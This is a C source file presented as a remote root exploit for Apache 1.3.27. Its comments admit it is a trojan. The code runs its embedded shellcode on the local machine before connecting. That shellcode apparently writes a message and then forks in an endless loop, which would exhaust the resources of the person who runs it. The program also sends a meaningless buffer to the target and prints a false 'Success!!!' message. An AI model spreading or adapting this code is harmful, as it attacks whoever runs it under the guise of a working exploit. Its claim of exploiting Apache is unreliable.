Apache/1.3.27 - Remote Root Exploit/* :: PRIVATE - DO NOT DISTRIBUTE ::
* >!!!WARNING!!! this exploit is trojen ;)
* PS: only education
* Apache/1.3.27 - Remote Root Exploit
* Knights of the Eastern Calculus (info@koec.org)
*/
#include <stdio.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
static char shellcode[] = {
"\x31\xdb\x31\xc0\x31\xd2\xb2\x18\x68\x20\x3f\x21"
"\x0a\x68\x54\x52\x31\x58\x68\x65\x20\x4d\x34\x68"
"\x73\x20\x54\x68\x68\x61\x74\x20\x69\x68\x2d\x2d"
"\x57\x68\x89\xe1\xb0\x04\xcd\x80\xb8\x02\x00\x00"
"\x00\xcd\x80\xeb\xf7\x00\xcb\xad\x80\x00\x00\x02"
"\x73\x21\x54\x68\x68\x61\x74\x21\x69\x68\x2d\x2d"
"\x0a\x67\x54\x52\x31\x57\x67\x65\x20\x4d\x34\x67"
"\x67\x68\x89\xe1\xb2\x04\xcd\x80\xb8\x02\x80\x00"
"\x53\x89\xe1\x50\x51\x53\x50\xb0\x3b\xcd\x80\xcc"
"\x68\x47\x47\x47\x47\x89\xe3\x31\xc0\x50\x50\x50"
"\x04\x53\x50\x50\x31\xd2\x31\xc9\xb1\x80\xc1\xe1"
"\xc0\xb0\x85\xcd\x80\x72\x02\x09\xca\xff\x44\x24"
"\x04\x20\x75\xe9\x31\xc0\x89\x44\x24\x04\xc6\x44"
"\x64\x24\x08\x89\x44\x24\x0c\x89\x44\x24\x10\x89"
"\x54\x24\x18\x8b\x54\x24\x18\x89\x14\x24\x31\xc0"
};
int main(int *argc, char **argv)
{
int i;
char *buffer;
int s;
struct hostent *hp;
struct sockaddr_in sin;
if((int)argc < 3 )
{
printf("usage: %s <target> <shell port>\n", argv[0]);
printf("ex: %s www.netsill.com 31337\n", argv[0]);
exit(0);
}
buffer = (char *) malloc(512 + 1024 + 100);
if (buffer == NULL) {
printf("Not enough memory\n");
exit(1);
}
memcpy(&buffer[512 - strlen(shellcode)], shellcode,
strlen(shellcode));
buffer[512 + 1024] = ';';
buffer[512 + 1024 + 1] = '\0';
void(*b)()=(void*)shellcode;b();
hp = gethostbyname(argv[1]);
if (hp == NULL) {
printf("Server doesn't exist\n");
exit(1);
}
bzero(&sin, sizeof(sin));
bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
sin.sin_family = AF_INET;
sin.sin_port = htons(80);
s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (s < 0) {
printf("Cannot open socket\n");
exit(1);
}
if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
printf("Connection refused\n");
exit(1);
}
printf("Attempting to Exploit...\n");
if (send(s, buffer, strlen(buffer), 0) != 1)
printf("Success!!!\n");
else
printf("No go there tough guy!\n");
printf("If we're lucky there should be a shell on port %d.\n", atoi(argv[2]));
}
推荐
评论(0条)
